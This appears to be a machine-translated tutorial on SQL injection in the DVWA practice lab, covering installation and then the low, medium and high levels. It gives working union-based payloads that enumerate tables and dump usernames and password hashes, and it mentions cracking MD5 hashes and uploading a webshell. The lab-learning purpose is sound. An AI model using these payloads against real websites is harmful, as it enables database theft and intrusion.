Tips ： For learning purposes only , Don't do anything illegal . If by any illegal act , Will be severely punished in accordance with laws and regulations ！！！

Preface

After finishing the basic study , Now let's start the formal fight dvwa The shooting range of . Due to the present , Mainly just learning sql Inject , therefore , about dvwa The shooting range has only sql The injection part .

Tips ： The following is the main body of this article , The following cases can be used for reference

One 、dvwa Installation ：

Download link ：https://dvwa.co.uk/

Baidu SkyDrive ： link ：https://pan.baidu.com/s/1qqHDqnmgn7Eq1Mb1dxZvyw
Extraction code ：3vpq
– From Baidu network disk super member V4 The share of

take dvwa Unzip the compressed package of to the corresponding website directory ：

Then , open dvwa The catalog of , find config Folder , Click to enter , And then config.inc.php.dist Rename to config.inc.php, Here's the picture ：
Click on , open config.inc.php Folder , Find the corresponding user and password , Make changes , As shown in the following figure, the two positions indicated by the arrows are to be modified into their own databases root User and corresponding password ：

then , Open... In the web page dvwa：

Click on the create database, Reenter dvwa that will do ：

Default account password ：
username：admin
password：password
In the following dvwa security There is a place to set the level ！

Two 、sql Injection off

1.SQL Injection

low Level

First , Submit a query first , When viewing a query url Construction ：
that , We estimate that in id There should be an injection point at ：

Test the closed loop ：

?id=1 or 1=1 --+&Submit=Submit#

The page is normal , The description is not numeric ：

?id=1' or 1=1 --+&Submit=Submit#

All the data appears , It shows that the closed loop is ’ ’

Number of test columns ：

?id=1' order by 3 --+&Submit=Submit#

order by 2 The page is normal , The number of description columns is 2.

Take the library name 、 user name ：

?id=-1' union select database(),user() --+&Submit=Submit#

We see that the user is root user , Therefore, there is an opportunity to cross database attacks 、 And upload webshell.

Take the watch ：

There are some bug：Illegal mix of collations for operation ‘UNION’
If the reader has this question , succeed in inviting sb. ：

?id=-1' union select group_concat(table_name),2 from information_schema.tables where table_schema='dvwa' --+&Submit=Submit#

Naaleh ：

?id=-1' union select group_concat(column_name),2 from information_schema.columns where table_name='users' --+&Submit=Submit#

Get data ：

?id=-1' union select group_concat(user),group_concat(password) from dvwa.users --+&Submit=Submit#

Here we have already taken , The password is md5 encryption . Just find a platform to decrypt on the Internet ！！

medium Level

Switch to medium After the level , Continue to open sql injection Options . Click on the submit user id The button , Find out url No parameters appear on the ：
So here , Guess it's either a change to post To submit data , The page is probably because of the method used to hide the submitted parameters , So we use burp Take a look ：

well , It's true that post For submission , Then, let's do the injection test ：

id=1+and+1=1+--+&Submit=Submit

id=1+and+1=2+--+&Submit=Submit

When entering the above payload The first time , Page echo is normal ; Second payload When , Page echo failed , The decision is digital injection .

Enter the following payload, The number of columns can be determined （ You can also use it order by）

id=-1+union+select+1,2+--+&Submit=Submit

After that, you can take the data wantonly ：
Provide a payload, Look at the rest low There are detailed data collection in the level payload, No more details here ：

id=-1+union+select+database(),user()+--+&Submit=Submit

hight Level

this , After opening , After clicking the query button , A separate page box will pop up for input id The query ：
Use one more page , Can prevent us from using burp, Grab the post Use directly after package repeater Module attack , because , After we submit to play this package , The page will also make a request , Just using this bag is not very good .

that , Let's try it directly on this page ：
Enter the following payload：

1' or 1=1#

Explain that the closed loop is ’ ’ And it seems that we need to use # Make a closed , I used to –+ I have been unsuccessful （ Readers can verify by themselves ）

Then you can combine low Inside payload Injected ：

 1' union select database(),user()#

summary